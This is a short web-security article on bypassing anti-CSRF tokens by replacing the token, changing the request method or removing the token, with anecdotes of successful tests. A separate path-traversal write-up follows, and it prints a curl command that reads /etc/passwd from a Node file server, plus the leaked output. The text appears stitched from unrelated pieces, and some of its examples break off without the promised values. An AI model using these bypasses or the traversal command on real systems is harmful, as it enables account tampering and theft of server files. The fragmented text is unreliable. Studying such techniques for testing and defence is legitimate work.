Bypassing CSRF Protection
Rajesh Ranjan. In most of the cases, the web applications are protected by some anti CSRF token, but there are few ways by which we can bypass these protection. Here I have describe few ways to bypass the protection.
Replacing the token value with same length
Sometimes by replacing the token with the same length may lead to bypass the CSRF protection, like if the token value is of 32 character long in the
csrf_token variable, then try to replace the same with another 32 character value.
Example: if your token value
csrf_token=8d959ed6e0109c03635b45921f9b17d9 then replace it with the any 32 character long like
Changing the Request Method
The another way to Bypass the CSRF protection is by changing the request method, like if any sensitive action is done via POST method, try to change it to GET method, sometime it might work.
Suppose here is a request for the password change.
Remove the CSRF token completely
This technique for bypassing the CSRF protection is famous and it works in few cases. In this what we can do is, remove the
csrf_token value completely and then submit the request.
Case 1: I was testing a web application and found that, while adding an address to account, there is an anti-csrf token present in the request. So I tried to remove the
csfr_token value from the request and the request got submitted. So I was able to add attacker’s address into the Victim’s account
Case 2: This was an e-commerce website and there was an option to add items to cart. So I capture the add to cart request, and tried to remove the anti-csrf token, and the same way request got submitted.
In this case, an attacker may be able to add any items to victim cart. If victim do not find this item, he/she would pay for this item which can greatly influence company reputation
Path Traversal and Capabilities
Path traversal attacks are also known as directory traversal which leads to unrestricted access to different directories that are stored outside the web root folder. Manipulating different variables that references files such as,
../../../ sequences the attacker can achieve unrestricted access to files that are related to the application sources code or configuration in the critical files.
Write Up and Explanation
The attacker saw the path traversal possible through a general file server made by nodejs. Once the attacker knew the technology that it was running, he proceeds to install the
general file server in his machine by serving the different modules and executing the following curl command:
curl -v --path-as-is http://127.0.0.1:8080/../../../../../../etc/passwd
The attacker got the following result:
* Trying 127.0.0.1... * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0) > GET /../../../../../../etc/passwd HTTP/1.1 > Host: 127.0.0.1:8080 > User-Agent: curl/7.47.0 > Accept: */* > < HTTP/1.1 200 OK < Content-Type: application/octet-stream < Date: Wed, 31 Jan 2018 12:53:13 GMT < Connection: keep-alive < Transfer-Encoding: chunked < root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin (...)